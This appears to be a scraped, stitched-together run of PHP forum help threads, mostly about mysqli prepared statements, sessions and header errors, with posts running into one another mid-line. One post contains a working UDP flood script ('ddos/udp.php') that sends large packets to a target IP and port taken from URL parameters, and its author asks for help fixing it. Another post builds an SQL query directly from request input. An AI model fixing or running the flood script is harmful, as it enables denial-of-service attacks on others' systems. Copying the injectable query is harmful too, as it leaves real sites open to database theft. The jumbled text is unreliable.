$stmt->bind_param("ssssi", $this->username, $secure_pass, $this->clean_email, $this->activation_token, $this->user_active);
$stmt->execute();
$inserted_id = $mysqli->insert_id;
$stmt->close();
//Insert default permission into matches table
$stmt = $mysqli->prepare("INSERT INTO ".$db_table_prefix."user_permission_matches (
user_id,
permission_id
)
VALUES (
?,
'1'
)") ;
$stmt->bind_param("s", $inserted_id);
$stmt->execute();
$stmt->close();
}
}
}
}
?>
Hi all !
I have a piece of code he
$result = display_all(fcon, $var1, $var2); function display_all( // defined in another file $query = "SELECT one, two, three four, index1, index2 FROM numbers WHERE index1 = $var1 LIMIT 0, 1"; $result = mysqli_query($fcon, $query); return ($result); )and then I use the returned variable $result to display the value as follows:-
while ($row = mysqli_fetch_array($result, MYSQLI_ASSOC))
{
echo "<tr>";
echo "<td>".$one."</td>";
echo "<td>".$two."</td>";
echo "<td>".$three. "</td>";
echo "<td>".$four. "</td>";
echo "<td>".$index1. "</td>";
echo "</tr>";
}
and this displays the n rows of data returned.
Now I have started using prepared statements and the function is now
function display_all{
$query = "SELECT one, two, three four, index1 FROM numbers WHERE index1 = ?
LIMIT 0, 10";
$stmt = $conn->prepare($query);
$stmt->bind_param('i',$var)
if($stmt->execute())
{
$stmt->bind_result($one, $two, $three, $four, $index1);
$stmt->store_result();
}
return($stmt);
}
However the returned $stmt object is unable to display the n rows of data since it shows null values. I assume that this is not the right way to use the $stmt object to display data. I must be missing something. So I request you guys to help me with this.
Thanks loads.
Edited by ajoo, 23 December 2014 - 11:24 AM. I'm new to coding and prepared statements.
I'm getting: For this:
<?php
include "db_connect.php";
if(isset($_POST['UserID'])){
$stmt = $con -> prepare('UPDATE UserList
SET Status = ?,
FirstName = ?,
LastName = ?,
Username = ?,
Email = ?,
Department = ?,
Manager = ?,
WHERE UserID = ?');
$stmt -> bind_param('isssssss', /* Line 17 */
$_POST['Status'],
$_POST['FirstName'],
$_POST['LastName'],
$_POST['Username'],
$_POST['Email'],
$_POST['Department'],
$_POST['Manager'],
$_POST['UserID']);
$stmt->execute();
}
Thank you in advance for helping. 2 9 0 1 Fatal error: Call to a member function bind_param() on boolean.
It fails on the BIND_PARAM line.
I have looked at this all day, struggling with Mysqli as my normal MySql works fine with assoc and fetch.
I have verified in PhpInfo that mysqli is enabled. I have verified its loaded using <?php print_r(get_loaded_extensions()); Added utf8 just to make sure.
If I manually use the Wrong Password, I get a connection refused error, so I know its connected.
Verified my $_POST variables are there using Print in the 2 9 0 1 above.
All Table and Field Names are correct. Manual Insert works fine in myPhpAdmin. Tried Field Names and ? marks with and without single quotes. All fields are Integers in the table.
Could it be related to an Auto_Increment Field in the table for a record ID that I am not providing?? A normal insert in myPhpAdmin doesn't need it.
$QuestionID = $_POST['qID']; print $QuestionID . " ";
Thanks, CadJoe Edited August 26, 2017 by CadJoeHey i am having some issues with some code. The values were submitted by a form but i want to change it to its submitted by the URL using $_GET. But doesnt want to work. Can someone please help me? This is just POC code no malicious intentions here. PHP is not my first language. Would appreciate any help. I am using netcat to test this. <?php $packets = 0; $ip = $_GET['ip']; $rand = $_GET['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_GET['time']; $time = time(); $max_time = $time+$exec_time; for($i=0;$i<65535;$i++){ $out .= "X"; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } ?> URL Example: http://127.0.0.1/ddos/udp.php?ip=127.0.0.1?port=81?time=10 Error: Warning: fsockopen() [function.fsockopen]: unable to connect to udp://127.0.0.1?port=81?time=1:0 (Failed to parse address "127.0.0.1?port=81?time=1") in C:\xampp\htdocs\ddos\udp.php on line 19 Will not parse the variables properly. Have spent so much time on this. Could someone please help me out here?
I've been using the code below in some of my WordPress pages, but I've looked at it so long ago that I honestly can't remember how to debug it - go figure... The only thing that changed was the database.
It works like this:
URL has parameter called id in this form: http://example.com/post?id=...
Code checks if param is present, otherwise it redirects home.
If the param is present, code gets the ID and compares it to the records in the MySQL database hosted by my ISP.
Match gets used in an echo statement.
A div on the page is activated.
Database Layout:
+-------+------------+------------+------------+------------+---------------+ | id | Naam | Metgesel | Kind1 | Kind2 | Email | +-------+------------+------------+------------+------------+---------------+ | abc12 | Bobby | Caily | * | * | b@example.com | | ... | ... | ... | ... | ... | ... | +-------+------------+------------+------------+------------+---------------+ERROR ENCOUNTERED: Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /home/.../public_html/wp-content/plugins/insert-php-code-snippet/shortcode-handler.php(32) : eval()'d code on line 4 Invalid or no security key!Code:
<script>
function invite(){
document.getElementById('invite').style.display=(document.getElementById('invite').style.display=='block')?'none':'block';
}
</script>
<script>
function returnHome(){
setTimeout(function () {window.location.href = 'http://example.com';},2000);
}
</script>
$part = $_REQUEST['id'];
if(isset($_GET["id"])){
$query = sprintf("SELECT * FROM `DATABASE`.`TABLE`
WHERE idquack='$part'",
mysql_real_escape_string($query));
$result = mysql_query($query);
if (!$result) {
$message = 'Invalid or no security key!';
die($message);
} else {
while ($row = mysql_fetch_assoc($result)) {
if ($row['Metgesel'] != "*"){
if ($row['Metgesel'] == "#"){
if ($row['Kind1'] != "*"){
if ($row['Kind2'] != "*"){
echo '<h1>' . $row['Naam'] . ", " . "Metgesel" . ", " . $row['Kind1'] . " en " . $row['Kind2'] . "</h1>";
} else {
echo '<h1>' . $row['Naam'] . ", " . "Metgesel" . " en " . $row['Kind1'] . "</h1>";
}
} else {
echo '<h1>' . $row['Naam'] . " en " . "Metgesel" . "</h1>";
}
} else{
if ($row['Kind1'] != "*"){
if ($row['Kind2'] != "*"){
echo '<h1>' . $row['Naam'] . ", " . $row['Metgesel'] . ", " . $row['Kind1'] . " en " . $row['Kind2'] . "</h1>";
} else {
echo '<h1>' . $row['Naam'] . ", " . $row['Metgesel'] . " en " . $row['Kind1'] . "</h1>";
}
} else {
echo '<h1>' . $row['Naam'] . " en " . $row['Metgesel'] . "</h1>";
}
}
} else {
echo '<h1>' . $row['Naam'] . "</h1>";
}
echo '<script>invite();</script>';
}
}
mysql_free_result($result);
} else{
echo 'Hold on tight - we're taking you to safety!';
echo '<script>returnHome();</script>';
}
Hi Everyone I am having a few issues with my website. I have developed in on my xampp local host and it works ok but when I upload the files and try to renew a membership using stripe I get the following messages. Warning: session_start(): Cannot start session when headers already sent in /customers/a/d/f/mywebsite.co.uk/httpd.www/mywebsite/inc/settings.php on line 2 Warning: Cannot modify header information - headers already sent by (output started at /customers/a/d/f/mywebsite.co.uk/httpd.www/mywebsite/procedures/payments/charge.php:1) in /customers/a/d/f/mywebsite.co.uk/httpd.www/mywebsite/procedures/payments/charge.php on line 141 I have some includes that appear on every page. This is the bootstrap.php file. This file holds the settings.php which connects to my database and other function files. In this settings page I call the session_start() php function and then connect to my database. I call the bootstrap.php file on every page to there for call the session_start() on every page. I am using sessions alot so is this the right thing to do? I have attached the renew_membership payment page which holds the form. The user fills out the payment page and the form data gets sent to a script called charge.php which uses the stripe objects to make the payment. I then want to do a redirect to the paymentSuccess.php page to output to the user that the payment was made successfully. This is where the issues arrise. I have split the charge file into 3 screen shots so it is more readable. Hope someone can help me. Thanks a lot David
Edited April 26 by Irish_Dave I am running to an issue that I have never delt with before and am not sure if there is even a possible solution: I have two files: fileA and fileB fileA contains a loop that loops 30 times each time its called. in the loop there is a 2second delay $i = 1; do { $i++; sleep(2); if(!isset($_SESSION['user']) { break; } } while($i < 31); if fileB i have a simple destroy session $_SESSION = array(); session_destroy(); I call both files via ajax, and that is where i run into my problem. if I call fileA first, then call fileB through ajax, the code in FileB does not execute until fileA has run its course. Is it possible to get around this? Like set the priority of one over the other? |
|||||||